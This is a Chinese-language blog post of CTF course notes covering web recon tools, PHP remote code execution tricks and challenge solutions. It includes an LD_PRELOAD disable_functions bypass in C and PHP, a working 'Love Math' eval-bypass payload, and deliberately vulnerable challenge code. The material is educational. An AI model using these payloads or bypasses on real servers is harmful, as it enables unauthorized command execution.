<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/file/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/file/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/file/favicon-16x16.png">
  <link rel="mask-icon" href="/file/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"czlz.net","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="前言今天的学习内容巨多，也不知道一下是否能消化完。">
<meta property="og:type" content="article">
<meta property="og:title" content="黑盒测试、RCE、CVE（大比武_CTF课_第五天）">
<meta property="og:url" content="https://czlz.net/2020/jxsw_dbw_web_5/index.html">
<meta property="og:site_name" content="粗制乱造的个人网站">
<meta property="og:description" content="前言今天的学习内容巨多，也不知道一下是否能消化完。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://czlz.net/2020/jxsw_dbw_web_5/EasyWeb.png">
<meta property="og:image" content="https://czlz.net/2020/jxsw_dbw_web_5/database.png">
<meta property="article:published_time" content="2020-07-03T16:00:00.000Z">
<meta property="article:modified_time" content="2020-07-06T01:28:55.473Z">
<meta property="article:author" content="粗制乱造">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="练习题">
<meta property="article:tag" content="CTF课">
<meta property="article:tag" content="WEB">
<meta property="article:tag" content="黑盒测试">
<meta property="article:tag" content="RCE">
<meta property="article:tag" content="CVE">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://czlz.net/2020/jxsw_dbw_web_5/EasyWeb.png">

<link rel="canonical" href="https://czlz.net/2020/jxsw_dbw_web_5/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>黑盒测试、RCE、CVE（大比武_CTF课_第五天） | 粗制乱造的个人网站</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">粗制乱造的个人网站</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">杂七杂八的一堆东西</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-python">

    <a href="/pyodide/" rel="section"><i class="fa fa-user fa-fw"></i>在线Python3.8</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://czlz.net/2020/jxsw_dbw_web_5/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/file/avatar.png">
      <meta itemprop="name" content="粗制乱造">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="粗制乱造的个人网站">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          黑盒测试、RCE、CVE（大比武_CTF课_第五天）
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-07-04 00:00:00" itemprop="dateCreated datePublished" datetime="2020-07-04T00:00:00+08:00">2020-07-04</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-07-06 09:28:55" itemprop="dateModified" datetime="2020-07-06T09:28:55+08:00">2020-07-06</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/%E7%AC%94%E8%AE%B0/" itemprop="url" rel="index"><span itemprop="name">笔记</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/%E7%AC%94%E8%AE%B0/WEB/" itemprop="url" rel="index"><span itemprop="name">WEB</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/%E7%AC%94%E8%AE%B0/WEB/%E9%BB%91%E7%9B%92%E6%B5%8B%E8%AF%95/" itemprop="url" rel="index"><span itemprop="name">黑盒测试</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <!-- toc -->
<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>今天的学习内容巨多，也不知道一下是否能消化完。</p>
<a id="more"></a>
<h1 id="CTF做题思路与工具使用"><a href="#CTF做题思路与工具使用" class="headerlink" title="CTF做题思路与工具使用"></a>CTF做题思路与工具使用</h1><h2 id="CTF题型"><a href="#CTF题型" class="headerlink" title="CTF题型"></a>CTF题型</h2><p>1、黑盒测试：考察基础漏 洞理解，与 利用。<br>2、白盒测试：主要考察代码审计 能力， 可能会结合文件泄 露，黑盒测试。<br>3、CVE、漏洞复现：考察信息搜 集能力，与 CVE复现能力。</p>
<h2 id="CTF工具使用"><a href="#CTF工具使用" class="headerlink" title="CTF工具使用"></a>CTF工具使用</h2><h3 id="黑盒——信息搜集"><a href="#黑盒——信息搜集" class="headerlink" title="黑盒——信息搜集"></a>黑盒——信息搜集</h3><h4 id="dirsearch"><a href="#dirsearch" class="headerlink" title="dirsearch"></a>dirsearch</h4><p>一个简单的命令行工具，旨在暴力破解网站中的目录和文件。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 dirsearch.py –u url –e * -w &#x2F;home&#x2F;dic.txt</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">• 常用参数： </span><br><span class="line">    • -h, --help 查看帮助 </span><br><span class="line">    • -u URL, --url&#x3D;URL 设置url </span><br><span class="line">    • -e EXTENSIONS, --extensions&#x3D;EXTENSIONS 网站脚本类型 </span><br><span class="line">    • -w WORDLIST, --wordlist&#x3D;WORDLIST 设置字典 </span><br><span class="line">    • -r, --recursive Bruteforce recursively 递归地扫描 </span><br><span class="line">    • -c COOKIE, --cookie&#x3D;COOKIE 设置cookie </span><br><span class="line">    • -H HEADERS, --header&#x3D;HEADERS 设置请求头</span><br></pre></td></tr></table></figure>
<h4 id="CTF常用字典"><a href="#CTF常用字典" class="headerlink" title="CTF常用字典"></a>CTF常用字典</h4><p>• <a href="https://github.com/TheKingOfDuck/fuzzDicts" target="_blank" rel="noopener">https://github.com/TheKingOfDuck/fuzzDicts</a><br>• <a href="https://github.com/ev0A/ArbitraryFileReadList" target="_blank" rel="noopener">https://github.com/ev0A/ArbitraryFileReadList</a></p>
<h4 id="文件泄露利用工具"><a href="#文件泄露利用工具" class="headerlink" title="文件泄露利用工具"></a>文件泄露利用工具</h4><p>• git文件泄露利用工具 GitHack<br><a href="https://github.com/lijiejie/GitHack" target="_blank" rel="noopener">https://github.com/lijiejie/GitHack</a></p>
<p>• DS_store文件泄露利用工具 ds_store_exp<br><a href="https://github.com/lijiejie/ds_store_exp" target="_blank" rel="noopener">https://github.com/lijiejie/ds_store_exp</a></p>
<p>• 各种版本控制系统文件泄露工具 dvcs-ripper<br><a href="https://github.com/kost/dvcs-ripper" target="_blank" rel="noopener">https://github.com/kost/dvcs-ripper</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">• rip-git.pl -v -u http:&#x2F;&#x2F;www.example.com&#x2F;.git&#x2F; </span><br><span class="line">• rip-hg.pl -v -u http:&#x2F;&#x2F;www.example.com&#x2F;.hg&#x2F; </span><br><span class="line">• rip-bzr.pl -v -u http:&#x2F;&#x2F;www.example.com&#x2F;.bzr&#x2F; </span><br><span class="line">• rip-svn.pl -v -u http:&#x2F;&#x2F;www.example.com&#x2F;.svn&#x2F; </span><br><span class="line">• rip-cvs.pl -v -u http:&#x2F;&#x2F;www.example.com&#x2F;CVS&#x2F;</span><br></pre></td></tr></table></figure>

<p>• 可能存在的其它泄露</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">• www.rar </span><br><span class="line">• www.zip </span><br><span class="line">• www.7z </span><br><span class="line">• www.tar.gz </span><br><span class="line">• www.bak </span><br><span class="line">• .index.php.swp vim文件泄露 </span><br><span class="line">• robots.txt</span><br></pre></td></tr></table></figure>
<h4 id="黑盒——漏洞攻击篇"><a href="#黑盒——漏洞攻击篇" class="headerlink" title="黑盒——漏洞攻击篇"></a>黑盒——漏洞攻击篇</h4><p>• 爆破工具——burpsuite</p>
<p>• hash长度扩展攻击——HashPump<br><a href="https://www.cnblogs.com/pcat/p/5478509.html" target="_blank" rel="noopener">https://www.cnblogs.com/pcat/p/5478509.html</a></p>
<p>• flask_session伪造——flask-session-cookie<br><a href="https://github.com/noraj/flask-session-cookie-manager" target="_blank" rel="noopener">https://github.com/noraj/flask-session-cookie-manager</a><br>flask中session是存储在客户端cookie中的，也就是存储在客户端。如果知道了session的秘钥，我们可 以修改session达到伪造身份、会话的效果。</p>
<p>• Jwt爆破工具——c-jwt-cracker<br><a href="https://github.com/brendan-rius/c-jwt-cracker" target="_blank" rel="noopener">https://github.com/brendan-rius/c-jwt-cracker</a></p>
<p>• php-mt_rand()随机数种子爆破——php_mt_seed<br><a href="https://www.openwall.com/php_mt_seed/" target="_blank" rel="noopener">https://www.openwall.com/php_mt_seed/</a><br>php中的mt_rand()随机数可以通过已知的前几位随机数计算出随机数种子，从而预测所有随机数</p>
<h1 id="RCE深入学习"><a href="#RCE深入学习" class="headerlink" title="RCE深入学习"></a>RCE深入学习</h1><h2 id="无数字字母RCE"><a href="#无数字字母RCE" class="headerlink" title="无数字字母RCE"></a>无数字字母RCE</h2><h3 id="函数的动态调用"><a href="#函数的动态调用" class="headerlink" title="函数的动态调用"></a>函数的动态调用</h3><p>(待整理)</p>
<h3 id="字符的取反"><a href="#字符的取反" class="headerlink" title="字符的取反"></a>字符的取反</h3><p>(待整理)</p>
<h3 id="寻找可利用函数"><a href="#寻找可利用函数" class="headerlink" title="寻找可利用函数"></a>寻找可利用函数</h3><h2 id="绕过disable-functions"><a href="#绕过disable-functions" class="headerlink" title="绕过disable_functions"></a>绕过disable_functions</h2><h3 id="利用LD-PRELOAD"><a href="#利用LD-PRELOAD" class="headerlink" title="利用LD_PRELOAD"></a>利用LD_PRELOAD</h3><p>• 根据文档介绍，如果使用LD_PRELOAD环境变量指定了一个共享库或共享对象，那么这个 共享对象会在其他对象加载前被加载(优先级最高)<br>• php中mail()这个方法会调用底层的getpid()<br>• getpid()可以被劫持<br>• 修改getpid()，会执行系统命令。<br>• 绕过disable_functions</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt; </span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt; </span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt; </span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">payload</span><span class="params">()</span> </span>&#123;</span><br><span class="line">     system(<span class="string">"ls -l / &gt; /tmp/cl4y.txt"</span>); </span><br><span class="line">     &#125;</span><br><span class="line">     </span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">geteuid</span><span class="params">()</span> </span>&#123;</span><br><span class="line">     <span class="keyword">if</span> (getenv(<span class="string">"LD_PRELOAD"</span>) == <span class="literal">NULL</span>) &#123;</span><br><span class="line">          <span class="keyword">return</span> <span class="number">0</span>; </span><br><span class="line">    &#125; </span><br><span class="line">    unsetenv(<span class="string">"LD_PRELOAD"</span>); </span><br><span class="line">    payload();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">gcc -c -fPIC hack.c -o hack </span><br><span class="line">gcc --share hack -o hack.so</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">    putenv(<span class="string">"LD_PRELOAD=./hack.so"</span>); </span><br><span class="line">    mail(<span class="string">''</span>,<span class="string">''</span>,<span class="string">''</span>,<span class="string">''</span>); </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<h4 id="工具"><a href="#工具" class="headerlink" title="工具"></a>工具</h4><p><a href="https://github.com/mm0r1/exploits" target="_blank" rel="noopener">https://github.com/mm0r1/exploits</a></p>
<h1 id="做题"><a href="#做题" class="headerlink" title="做题"></a>做题</h1><h2 id="2019-Love-Math"><a href="#2019-Love-Math" class="headerlink" title="2019 Love Math"></a>2019 Love Math</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="comment">//听说你很喜欢数学，不知道你是否爱它胜过爱flag</span></span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>($_GET[<span class="string">'c'</span>]))&#123;</span><br><span class="line">    show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="comment">//例子 c=20-1</span></span><br><span class="line">    $content = $_GET[<span class="string">'c'</span>];</span><br><span class="line">    <span class="keyword">if</span> (strlen($content) &gt;= <span class="number">80</span>) &#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">"太长了不会算"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    $blacklist = [<span class="string">' '</span>, <span class="string">'\t'</span>, <span class="string">'\r'</span>, <span class="string">'\n'</span>,<span class="string">'\''</span>, <span class="string">'"'</span>, <span class="string">'`'</span>, <span class="string">'\['</span>, <span class="string">'\]'</span>];</span><br><span class="line">    <span class="keyword">foreach</span> ($blacklist <span class="keyword">as</span> $blackitem) &#123;</span><br><span class="line">        <span class="keyword">if</span> (preg_match(<span class="string">'/'</span> . $blackitem . <span class="string">'/m'</span>, $content)) &#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">"请不要输入奇奇怪怪的字符"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp</span></span><br><span class="line">    $whitelist = [<span class="string">'abs'</span>, <span class="string">'acos'</span>, <span class="string">'acosh'</span>, <span class="string">'asin'</span>, <span class="string">'asinh'</span>, <span class="string">'atan2'</span>, <span class="string">'atan'</span>, <span class="string">'atanh'</span>, <span class="string">'base_convert'</span>, <span class="string">'bindec'</span>, <span class="string">'ceil'</span>, <span class="string">'cos'</span>, <span class="string">'cosh'</span>, <span class="string">'decbin'</span>, <span class="string">'dechex'</span>, <span class="string">'decoct'</span>, <span class="string">'deg2rad'</span>, <span class="string">'exp'</span>, <span class="string">'expm1'</span>, <span class="string">'floor'</span>, <span class="string">'fmod'</span>, <span class="string">'getrandmax'</span>, <span class="string">'hexdec'</span>, <span class="string">'hypot'</span>, <span class="string">'is_finite'</span>, <span class="string">'is_infinite'</span>, <span class="string">'is_nan'</span>, <span class="string">'lcg_value'</span>, <span class="string">'log10'</span>, <span class="string">'log1p'</span>, <span class="string">'log'</span>, <span class="string">'max'</span>, <span class="string">'min'</span>, <span class="string">'mt_getrandmax'</span>, <span class="string">'mt_rand'</span>, <span class="string">'mt_srand'</span>, <span class="string">'octdec'</span>, <span class="string">'pi'</span>, <span class="string">'pow'</span>, <span class="string">'rad2deg'</span>, <span class="string">'rand'</span>, <span class="string">'round'</span>, <span class="string">'sin'</span>, <span class="string">'sinh'</span>, <span class="string">'sqrt'</span>, <span class="string">'srand'</span>, <span class="string">'tan'</span>, <span class="string">'tanh'</span>];</span><br><span class="line">    preg_match_all(<span class="string">'/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/'</span>, $content, $used_funcs);  </span><br><span class="line">    <span class="keyword">foreach</span> ($used_funcs[<span class="number">0</span>] <span class="keyword">as</span> $func) &#123;</span><br><span class="line">        <span class="keyword">if</span> (!in_array($func, $whitelist)) &#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">"请不要输入奇奇怪怪的函数"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//帮你算出答案</span></span><br><span class="line">    <span class="keyword">eval</span>(<span class="string">'echo '</span>.$content.<span class="string">';'</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>又是PHP各种绕过题。<br>第一、长度不是超过80<br>第二、不能包含</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[&#39; &#39;, &#39;\t&#39;, &#39;\r&#39;, &#39;\n&#39;,&#39;\&#39;&#39;, &#39;&quot;&#39;, &#39;&#96;&#39;, &#39;\[&#39;, &#39;\]&#39;]</span><br></pre></td></tr></table></figure>
<p>第三、只能使用关键字中的函数<br>第四、只能包含白名单的字符串</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#39;&#x2F;[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*&#x2F;&#39;</span><br></pre></td></tr></table></figure>
<p>解题涉及到的函数</p>
<h3 id="base-convert"><a href="#base-convert" class="headerlink" title="base_convert"></a>base_convert</h3><p>base_convert(number,frombase,tobase);</p>
<table>
<thead>
<tr>
<th align="left">参数</th>
<th align="left">描述</th>
</tr>
</thead>
<tbody><tr>
<td align="left">number</td>
<td align="left">必需。规定要转换的数。</td>
</tr>
<tr>
<td align="left">frombase</td>
<td align="left">必需。规定数字原来的进制。介于 2 和 36 之间（包括 2 和 36）。高于十进制的数字用字母 a-z 表示，例如 a 表示 10，b 表示 11 以及 z 表示 35。</td>
</tr>
<tr>
<td align="left">tobase</td>
<td align="left">必需。规定要转换的进制。介于 2 和 36 之间（包括 2 和 36）。高于十进制的数字用字母 a-z 表示，例如 a 表示 10，b 表示 11 以及 z 表示 35。</td>
</tr>
</tbody></table>
<p>也就是说base_convert可以表示[0-9a-z]这些数。但是只能通过这个函数做点文章了。</p>
<h3 id="hex2bin"><a href="#hex2bin" class="headerlink" title="hex2bin"></a>hex2bin</h3><p>hex2bin(string)<br>将16进制数转换成ascii。<br>只有用这个，才能绕过。函数限制。</p>
<h3 id="dechex"><a href="#dechex" class="headerlink" title="dechex"></a>dechex</h3><p>把十进制转换为十六进制。为了配合hex2bin使用。</p>
<p>这三个就是关键函数。<br>由于有长度限制，要找最小可用的关键字<br>得到如下playload<br>?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){sin})&amp;pi=system&amp;sin=ls /</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">base_convert(37907361743,10,36) &#x3D;&gt; &quot;hex2bin&quot;</span><br><span class="line">dechex(1598506324) &#x3D;&gt; &quot;5f474554&quot;</span><br><span class="line">$pi&#x3D;hex2bin(&quot;5f474554&quot;) &#x3D;&gt; $pi&#x3D;&quot;_GET&quot;   &#x2F;&#x2F;hex2bin将一串16进制数转换为二进制字符串</span><br><span class="line">($$pi)&#123;pi&#125;(($$pi)&#123;sin&#125;) &#x3D;&gt; ($_GET)&#123;pi&#125;($_GET)&#123;sin&#125;  &#x2F;&#x2F;&#123;&#125;可以代替[]</span><br></pre></td></tr></table></figure>
<p>?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){sin})&amp;pi=system&amp;sin=cat /flag<br>得到flag</p>
<h2 id="SUCTF-2019-EasyWeb"><a href="#SUCTF-2019-EasyWeb" class="headerlink" title="[SUCTF 2019] EasyWeb"></a>[SUCTF 2019] EasyWeb</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_the_flag</span><span class="params">()</span></span>&#123;</span><br><span class="line">    <span class="comment">// webadmin will remove your upload file every 20 min!!!! </span></span><br><span class="line">    $userdir = <span class="string">"upload/tmp_"</span>.md5($_SERVER[<span class="string">'REMOTE_ADDR'</span>]);</span><br><span class="line">    <span class="keyword">if</span>(!file_exists($userdir))&#123;</span><br><span class="line">    mkdir($userdir);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(!<span class="keyword">empty</span>($_FILES[<span class="string">"file"</span>]))&#123;</span><br><span class="line">        $tmp_name = $_FILES[<span class="string">"file"</span>][<span class="string">"tmp_name"</span>];</span><br><span class="line">        $name = $_FILES[<span class="string">"file"</span>][<span class="string">"name"</span>];</span><br><span class="line">        $extension = substr($name, strrpos($name,<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">"/ph/i"</span>,$extension)) <span class="keyword">die</span>(<span class="string">"^_^"</span>); </span><br><span class="line">        <span class="keyword">if</span>(mb_strpos(file_get_contents($tmp_name), <span class="string">'&lt;?'</span>)!==<span class="keyword">False</span>) <span class="keyword">die</span>(<span class="string">"^_^"</span>);</span><br><span class="line">    <span class="keyword">if</span>(!exif_imagetype($tmp_name)) <span class="keyword">die</span>(<span class="string">"^_^"</span>); </span><br><span class="line">        $path= $userdir.<span class="string">"/"</span>.$name;</span><br><span class="line">        @move_uploaded_file($tmp_name, $path);</span><br><span class="line">        print_r($path);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$hhh = @$_GET[<span class="string">'_'</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!$hhh)&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(strlen($hhh)&gt;<span class="number">18</span>)&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">'One inch long, one inch strong!'</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ( preg_match(<span class="string">'/[\x00- 0-9A-Za-z\'"\`~_&amp;.,|=[\x7F]+/i'</span>, $hhh) )</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">'Try something else!'</span>);</span><br><span class="line"></span><br><span class="line">$character_type = count_chars($hhh, <span class="number">3</span>);</span><br><span class="line"><span class="keyword">if</span>(strlen($character_type)&gt;<span class="number">12</span>) <span class="keyword">die</span>(<span class="string">"Almost there!"</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">eval</span>($hhh);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

